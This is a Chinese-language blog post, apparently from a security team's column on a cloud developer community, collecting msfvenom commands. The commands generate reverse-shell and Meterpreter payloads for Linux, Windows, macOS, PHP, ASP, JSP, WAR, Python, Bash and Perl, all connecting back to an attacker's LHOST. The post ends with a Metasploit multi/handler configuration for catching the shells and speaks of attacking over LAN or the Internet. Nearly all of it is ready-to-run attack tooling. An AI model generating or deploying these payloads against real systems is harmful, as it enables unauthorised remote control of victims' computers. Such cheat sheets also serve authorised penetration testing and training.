前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >收藏Metasploit payload

收藏Metasploit payload

作者头像
Khan安全团队
发布2021-08-26 16:37:05
8700
发布2021-08-26 16:37:05
举报
文章被收录于专栏:Khan安全团队

通常 Metasploit 最有用(对于初学者来说被低估)的功能之一是 msfpayload 模块。可以使用此模块创建多个有效负载,它有助于在几乎任何情况下为您提供外壳。对于这些有效负载中的每一个,您都可以进入 msfconsole 并选择exploit/multi/handler。为使用的相关负载运行“设置负载”并配置所有必要的选项(LHOST、LPORT 等)。执行并等待有效负载运行。对于下面的示例,它是不言自明的,但 LHOST 应填写您的 IP 地址(如果在网络内进行攻击,则为 LAN IP,如果通过 Internet 进行攻击,则为 WAN IP),并且 LPORT 应该是您希望重新连接的端口。

Linux

代码语言:javascript
复制
msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f elf > shell.elf

Windows

代码语言:javascript
复制
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f exe > shell.exe

Mac

代码语言:javascript
复制
msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f macho > shell.macho

PHP

代码语言:javascript
复制
msfvenom -p php / meterpreter_reverse_tcp LHOST = <你的 IP 地址>  LPORT = <你的连接端口>  -f raw > shell.php
 cat shell.php | pbcopy &&  echo  '<?php'  |  tr  -d  '\n'  > shell.php && pbpaste >> shell.php

ASP

代码语言:javascript
复制
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f asp > shell.asp

JSP

代码语言:javascript
复制
msfvenom -p java / jsp_shell_reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f raw > shell.jsp

War

代码语言:javascript
复制
msfvenom -p java / jsp_shell_reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f war > shell.war

Python

代码语言:javascript
复制
msfvenom -p cmd / unix / reverse_python LHOST = <你的 IP 地址>  LPORT = <你要连接的端口>  -f raw > shell.py

Bash

代码语言:javascript
复制
msfvenom -p cmd / unix / reverse_bash LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f raw > shell.sh

Perl

代码语言:javascript
复制
msfvenom -p cmd / unix / reverse_perl LHOST = <你的 IP 地址>  LPORT = <你要连接的端口>  -f raw > shell.pl

Linux Based Shellcode

代码语言:javascript
复制
msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f  <语言>

Windows Based Shellcode

代码语言:javascript
复制
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f  <语言>

Mac Based Shellcode

代码语言:javascript
复制
msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f  <语言>

设置 Metasploit 以接收传入的 shell

代码语言:javascript
复制
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

完成所需的值后,以下命令将执行您的处理程序 – 'msfconsole -L -r '

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-08-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档